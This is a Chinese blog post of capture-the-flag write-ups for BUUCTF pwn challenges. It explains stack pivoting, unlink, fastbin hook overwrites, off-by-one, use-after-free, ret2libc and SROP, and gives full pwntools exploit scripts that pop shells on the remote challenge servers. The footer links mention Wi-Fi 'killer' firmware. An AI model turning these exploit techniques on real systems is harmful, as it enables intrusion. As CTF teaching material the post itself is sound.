BUUCTF-pwn(9)

最新推荐文章于 2022-05-01 20:10:44 发布
最新推荐文章于 2022-05-01 20:10:44 发布
阅读量787 收藏 1
点赞数 1
分类专栏: 快乐学习pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/njh18790816639/article/details/122263216
版权

gyctf_2020_borrowstack

在这里插入图片描述
使用栈迁移,将rsp迁移到bss段上,而bss段上处于可控位置。但是注意bss段低处处于不可写状态,如果rsp移动到该处,则程序无法进行下去!
在这里插入图片描述
尝试使用system函数,但是往往会涉及到bss段低处地址,而one_gadget则不需要过多占用栈地址,故采用one_gadget获取权限!

from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='amd64')

binary = './gyctf_2020_borrowstack'
r = remote('node4.buuoj.cn',26622)
#r = process(binary)
elf = ELF(binary)
start_addr = 0x0400530
main = elf.symbols['main']
bss_addr = 0x0601080
leave_ret = 0x0400699
ret = 0x04004c9
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x0400703
pop_rsi_r15_ret = 0x0400701

#gdb.attach(r)
r.recvuntil("Welcome to Stack bank,Tell me what you want\n")
payload = b'a'*0x60+p64(bss_addr+0xa0)+p64(leave_ret)
r.send(payload)
r.recvuntil("Done!You can check and use your borrow stack now!\n")
payload2 = b'a'*0xa0+p64(bss_addr+0xf0)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)#p64(0x0400680)
r.sendline(payload2)
puts_addr = u64(r.recv(6).ljust(8,b'\x00'))

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
one = libc_base+0x4526a
log.info("puts_addr -> "+hex(puts_addr))
log.info("libc_base -> "+hex(libc_base))
log.info("system -> "+hex(system))
log.info("sh -> "+hex(sh))

'''payload3 = b'cccccccc'+p64(pop_rdi_ret)+p64(sh)+p64(pop_rsi_r15_ret)+p64(0)+p64(0)+p64(system)
payload3 = payload3.ljust(0x70,b'a')+p64(leave_ret)'''
r.recvuntil("Welcome to Stack bank,Tell me what you want\n")
'''payload3 = b'dddddddd'+p64(pop_rdi_ret)+p64(sh)+p64(system)
payload3 = payload3.ljust(0x60,b'e')+p64(0x6010e0)+p64(leave_ret)'''
payload3 = b'a'*0x68+p64(one)
r.sendline(payload3)
r.sendlineafter("Done!You can check and use your borrow stack now!\n",'')

r.interactive()

wustctf2020_closed

在这里插入图片描述
在这里插入图片描述

0ctf_2017_babyheap

分析主要函数!
在这里插入图片描述
首先开启了一块地址!
在这里插入图片描述
该函数杜绝了UAF以及double free的一般攻击手段!
在这里插入图片描述
在这里插入图片描述
此时我们便得到了一个堆溢出漏洞,如此便都简单起来了!
在这里插入图片描述
在这里插入图片描述
首先我们可以通过Unlink攻击,从而泄露出lmain_arena,进而计算出libc_base基地址,此时我们便可以得到one_gadget地址,此时我们利用堆溢出修改fastbin的fd指针内容,指向__malloc_hook,此时我们申请,便可以修改__malloc_hook为one_gadget了。
注: calloc与malloc的区别在于申请的chunk会将内容置零!同样的calloc也存在__malloc_hook,也会经历__int_malloc函数!
在这里插入图片描述
注意本地libc与远程版本的偏移量不同!

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './0ctf_2017_babyheap'
r = remote('node4.buuoj.cn',25922)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
def Allocate(size=0x10):
    r.sendlineafter("Command: ",'1')
    r.sendlineafter("Size: ",str(size))

def Edit(index,size=0x10,payload=''):
    r.sendlineafter("Command: ",'2')
    r.sendlineafter("Index: ",str(index))
    r.sendlineafter("Size: ",str(size))
    r.sendafter("Content: ",payload)

def Free(index):
    r.sendlineafter("Command: ",'3')
    r.sendlineafter("Index: ",str(index))

def Show(index):
    r.sendlineafter("Command: ",'4')
    r.sendlineafter("Index: ",str(index))

def Exit():
    r.sendlineafter("Command: ",'5')


Allocate()#0
Allocate(0x80)#1
Allocate()#2
Allocate(0x80)#3
Allocate(0x60)#4

Free(1)#1
payload = b'a'*0x10+p64(0xb0)+p64(0x90)
Edit(2,len(payload),payload)
Free(3)#3
Allocate(0x80)#1
Show(2)
r.recvuntil("Content: \n")
main_arena = u64(r.recv(6).ljust(8,b'\x00'))-88
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']#0x3C3B20
log.info("main_arena -> "+hex(main_arena))
log.info("libc_base -> "+hex(libc_base))

system = libc_base+0x45380
sh = libc_base+0x18C58B
one = libc_base+0x4526a
Allocate(0xa0)#3

Allocate(0x60)#5
Allocate(0x60)#6
Free(5)#5
payload2 = b'a'*0x68+p64(0x71)+p64(main_arena-0x33)
Edit(4,len(payload2),payload2)

Allocate(0x60)#5
Allocate(0x60)#7

payload3 = b'a'*0x13+p64(one)
Edit(7,len(payload3),payload3)
#gdb.attach(r)
Allocate()

r.interactive()

roarctf_2019_easy_pwn(realloc_hook控制栈结构达成onegadget)

分析主要函数
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
此时我们发现了位于checkSize函数中的一个off by one漏洞,可以修改下一块的标志位,此时我们便可以使用Unlink的攻击手法了!
在这里插入图片描述
在这里插入图片描述
此时我们首先可以通过Unlink来泄露处main_arena,进而泄露处liba_base基地址!此时我们便开始考虑攻击手法了。
可以申请一块0x60大小的chunk,通过上面的Unlink可以修改fastbin的fd指针内容(改为main_arena-0x33),此时我们便可以往__malloc_hook上面写入内容了。
注: one_gadget四个都无法实现攻击,故我们可以采取中间手段进行攻击!修改__malloc_hook为realloc函数,而realloc函数同样有__realloc_hook钩子函数,且位于__malloc_hook附近,故我们可以修改__realloc_hook为one,调整realloc初始push来调整esp位置,进而使one_gadget达到具有攻击效果!
实际为malloc–>__malloc_hook–>realloc+0x2–>__realloc_hook–>one_gadget
在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './roarctf_2019_easy_pwn'
r = remote('node4.buuoj.cn',29812)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
def Allocate(size=0x18):
    r.sendlineafter("choice: ",'1')
    r.sendlineafter("size: ",str(size))

def Edit(index,size=0x18,payload=''):
    r.sendlineafter("choice: ",'2')
    r.sendlineafter("index: ",str(index))
    r.sendlineafter("size: ",str(size))
    r.sendafter("content: ",payload)

def Free(index):
    r.sendlineafter("choice: ",'3')
    r.sendlineafter("index: ",str(index))

def Show(index):
    r.sendlineafter("choice: ",'4')
    r.sendlineafter("index: ",str(index))

def Exit():
    r.sendlineafter("choice: ",'5')


Allocate()#0
Allocate(0x80)#1
Allocate()#2
Allocate(0x80)#3
Allocate()#4

Free(1)#1
Edit(2,0x18+10,b'a'*0x10+p64(0xb0)+p8(0x90))
Free(3)#3
Allocate(0x80)#1
Show(2)
r.recvuntil("content: ")
main_arena = u64(r.recv(6).ljust(8,b'\x00'))-88
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']#-0x3C3B20
realloc = libc_base+libc.symbols['realloc']#+0x3E2F30
one = libc_base+0x4526a#0x45206  0x4525a  0xef9f4  0xf0897
log.info("main_arena -> "+hex(main_arena))
log.info("libc_base -> "+hex(libc_base))

Allocate(0x60)#3
Free(3)#3
Edit(2,0x10,p64(main_arena-0x33)*2)
Allocate(0x60)#3
Allocate(0x60)#5
Edit(5,0x1b,b'a'*0xb+p64(one)+p64(realloc+2))
Allocate()
#r.sendline("ls")
#gdb.attach(r)

r.interactive()

hitcontraining_heapcreator

该题为off by one漏洞。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在Edit函数中存在read多读入一个字节,可以修改size大小,达到利用!
在这里插入图片描述
在这里插入图片描述
此时我们可以利用unsorted bin的特性泄露处main_arena,从而计算出libc_base基地址。同时我们可以修改size,进行Free并再次申请,此时我们便可以往再次申请的chunk中内部所存在的chunk进行写入内容了。
脚本较为复杂,泄露可以省略,因第二步时也达成了泄露地址的效果!故脚本可以进行简化,此处不再简化了

在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './heapcreator'
r = remote('node4.buuoj.cn',27600)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
free_got = elf.got['free']
def Allocate(size=0x18,payload=''):
    r.sendlineafter("Your choice :",'1')
    r.sendlineafter("Size of Heap : ",str(size))
    r.sendlineafter("Content of heap:",payload)

def Edit(index,payload=''):
    r.sendlineafter("Your choice :",'2')
    r.sendlineafter("Index :",str(index))
    r.sendlineafter("Content of heap : ",payload)

def Show(index):
    r.sendlineafter("Your choice :",'3')
    r.sendlineafter("Index :",str(index))

def Free(index):
    r.sendlineafter("Your choice :",'4')
    r.sendlineafter("Index :",str(index))

def Exit():
    r.sendlineafter("Your choice :",'5')

Allocate()#0
Allocate(0x80)#1
Allocate()#2

Free(1)#1
Allocate(0x10,b'a'*0x7)#1
Show(1)
r.recvuntil(b"aaaaaaa\n")
main_arena = u64(r.recv(6).ljust(8,b'\x00'))-216
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']#-0x3C3B20
system = libc_base+libc.symbols['system']#+0x45380
sh = libc_base+0x18cd57#+0x18C58B
log.info("main_arena -> "+hex(main_arena))
log.info("libc_base -> "+hex(libc_base))

Allocate()#3
Allocate()#4
Allocate()#5
Allocate()#6

Edit(3,b'a'*0x10+p64(0)+p8(0x91))
Free(4)#4
Allocate(0x80)#4
Edit(4,b'a'*0x20+p64(0)+p64(0x21)+p64(0x18)+p64(free_got))
Edit(2,p64(system))
Edit(4,b'a'*0x20+p64(0)+p64(0x21)+p64(0x18)+p64(sh))
Free(2)
#gdb.attach(r)


r.interactive()

hitcon2014_stkof

在这里插入图片描述
可以发现没有打印功能,但存在堆溢出漏洞!
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
此时我们可以使用Unlink,来修改bss段上的全局变量,此时我们便可以得到一个任意地址写,修改free_got为puts_plt,此时Free函数即为打印函数,故可以泄露出main_arena,此后我们计算出system函数地址,修改free_got地址为system函数地址,故此时free即为system函数,故我们写入chunk中"/bin/sh\x00",执行free(&chunk),既是执行system("/bin/sh\x00")!

在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './stkof'
r = remote('node4.buuoj.cn',29349)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
bss = 0x0602140
free_plt = elf.plt['free']
puts_plt = elf.plt['puts']
free_got = elf.got['free']
puts_got = elf.got['puts']
def Allocate(size=0x18):
    r.sendline('1')
    r.sendline(str(size))

def Edit(index,size=0x18,payload=b'a'*0x18):
    r.sendline('2')
    r.sendline(str(index))
    r.sendline(str(size))
    r.send(payload)

def Free(index):
    r.sendline('3')
    r.sendline(str(index))


Allocate()#1
Allocate(0x20)#2
Allocate(0x80)#3
Allocate()#4

target = bss+0x10
fd = target-0x18
bk = target-0x10
Edit(2,0x30,p64(0)+p64(0x21)+p64(fd)+p64(bk)+p64(0x20)+p64(0x90))
Free(3)#3
Allocate()#5

Edit(2,0x18,p64(0)*2+p64(free_got))
Edit(1,0x8,p64(puts_plt))
Free(5)
main_arena = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-248
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']#-0x3C3B20
system = libc_base+libc.symbols['system']#+0x45380
sh = libc_base+0x18C58B
log.info("main_arena -> "+hex(main_arena))

Edit(1,0x8,p64(system))
Edit(4,0x8,b'/bin/sh\x00')
Free(4)
#gdb.attach(r)

r.interactive()

ciscn_2019_s_9

该题较为简单!仅为ret2libc,但需要注意偏移量(动态调试得到正确的偏移量)
在这里插入图片描述

from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='i386')

binary = './ciscn_s_9'
r = remote('node4.buuoj.cn',25916)
#r = process(binary)
elf = ELF(binary)
#libc = ELF('./libc-2.27.so')
main = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
ret = 0x08048342
#gdb.attach(r,'b *0x0804856A')
r.recvuntil(">\n")
payload = b'a'*(0x20+0x4)+p32(puts_plt)+p32(main)+p32(puts_got)
r.sendline(payload)
r.recvuntil("OK bye~\n")

puts_addr = u32(r.recv(4))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.info("puts_addr -> "+hex(puts_got))
log.info("system -> "+hex(system))
log.info("sh -> "+hex(sh))

payload2 = b'a'*(0x24)+p32(system)+p32(sh)+p32(sh)
sleep(0.1)
r.sendline(payload2)

r.interactive()

pwnable_hacknote

该题为pwnable上原题!
在这里插入图片描述
经典UAF堆题目!
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

不过需要注意的是,我们一共可以申请5个chunk,即我们可以使用Allocate函数5次!
利用过程,便是通过修改程序所申请的chunk上的puts函数值为system函数,此时我们便可获取权限!
在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='i386')

binary = './hacknote'
r = remote('node4.buuoj.cn',26887)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')

def Allocate(size=0x8,payload='\n'):
    r.sendlineafter("Your choice :",'1')
    r.sendlineafter("Note size :",str(size))
    r.sendafter("Content :",payload)

def Free(index):
    r.sendlineafter("Your choice :",'2')
    r.sendlineafter("Index :",str(index))

def Show(index):
    r.sendlineafter("Your choice :",'3')
    r.sendlineafter("Index :",str(index))

def Exit():
    r.sendlineafter("Your choice :",'4')

Allocate(0x40)#0
Allocate()#1

Free(0)
Allocate(0x30,b'aaaa')#2
Show(2)
r.recvuntil(b'aaaa')
main_arena = u32(r.recv(4))-112
libc_base = main_arena-0x20-libc.symbols['__memalign_hook']#-0x1B2780
system = libc_base+libc.symbols['system']#+0x3AD80
sh = libc_base+0x0015902b#+0x15BA3F
log.info("libc_base -> "+hex(libc_base))
log.info("system -> "+hex(system))
log.info("sh -> "+hex(sh))

Allocate(0x8,b'/bin/sh\x00')#3 sh
Free(3)#2
Free(2)#3
Allocate(0x8,p32(system)+b';sh\x00')#4

#gdb.attach(r)
Show(3)

r.interactive()

ciscn_2019_es_7

该题目为SROP利用!
在这里插入图片描述
我们利用sigreturn进行修改寄存器数值,然后返回到syscall,调用execve!
在这里插入图片描述
在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './ciscn_2019_es_7'
r = remote('node4.buuoj.cn',27375)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.27.so')
pop_rdi_ret = 0x04005a3
sigreturn = 0x4004DA
syscall = 0x400517
vuln = 0x04004ED

payload = b'a'*0x10+p64(vuln)+b'b'*0x7+b'\n'
#gdb.attach(r)
r.send(payload)
r.recvuntil(b'bbbbbbb\n')
stack_addr = u64(r.recv(6).ljust(8,b'\x00'))-0x100-0x8
log.info("stack_addr -> "+hex(stack_addr))

sleep(0.1)
sig = SigreturnFrame()#未设置的默认为0
sig.rax = constants.SYS_execve
sig.rdi = stack_addr-0x10
sig.rip = syscall
payload2 = b'/bin/sh\x00'+b'd'*0x8+p64(sigreturn)+p64(syscall)+bytes(sig)
r.send(payload2)

r.interactive()
四代机您发多少
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hitcontraining_playfmt 解题思路
Morphy_Amo的博客
03-19 666
格式化字符串
hitcontraining_playfmt
qq_62887641的博客
09-14 85
32位保护全关存在格式化字符串漏洞,并且是bss段,也就是非栈上的格式化字符串。
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
buuctf hitcon_training,axb_2019_heap,unlink一般利用方法总结
weixin_46521144的博客
07-10 183
两道都是使用了unlink 并且两道题的方法一模一样,和上一篇的ZCTF的一道题也一样 使用unlink的题目一般有这样的特征 指针位置泄露(这三道题全都是在bss上的指针) 存在off-by-one或者off-by-null以及其他溢出修改漏洞 第一条用于控制unlink堆块的检验,第二条用于激活unlink,两者缺一不可。 利用方法: 制造unlink块,修改fd为ptr-0x18,bk为ptr-0x10,构造chunk_head和下一个chunk的prev_size,通过off修改下一个chun
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
wustctf2020_babyfmt
N1rvana的博客
04-07 438
一道简单fmt题,但是我搜解题记录时,觉得解得都挺复杂的。 似乎还没有文章用我的方法,那我就写一种简单的解法。 绕过fmt判断条件 我只用到了fmt_attack函数。 由于有一个判定条件: unsigned __int64 __fastcall fmt_attack(int *a1) { char format[56]; // [rsp+10h] [rbp-40h] BYREF unsigned __int64 v3; // [rsp+48h] [rbp-8h] v3 = __readfsq
BUUCTF-PWN刷题记录-7
weixin_44145820的博客
04-15 881
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 6786
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
[BUUCTF]PWN------rip
BangSen1的博客
01-13 314
rip 例行检查,无保护 运行一下,输出了我们输入的东西, 用64位IDA打开,看到了/bin/sh
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2
Y_peak的博客
02-14 260
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2 checksec一下,64位,开启NX,应该要用到ROPgadget,先看看 在IDA中 思路 利用printf先leek出来一个地址,这里选用了read的地址。找到libc,计算偏移,最终算出,system函数地址和’/bin/sh’字符串的地址。由于是64位,注意寄存器储存参数。(参数小于等于
BUUCTF(pwn)[HarekazeCTF2019]baby_rop
半岛铁盒的博客
03-29 140
因为是64位参数是储存在寄存器中,binsh字符串应该放在 rdi 寄存器中 from pwn import* p = remote("node3.buuoj.cn",28711) rdi=0x400683 sys=0x4005e3 bin=0x601048 payload='a'*(0x10+8)+p64(rdi)+p64(bin)+p64(sys) p.sendline(payload) flag不在根目录下,需要我们找一下,利用find -name flag找一下 find -name "fla.
BUUCTF PWN部分题目wp
awxnutpgs545144602的博客
08-16 2004
pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda计算偏移为23,写脚本 from pwn import* sh=remote('f.b...
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值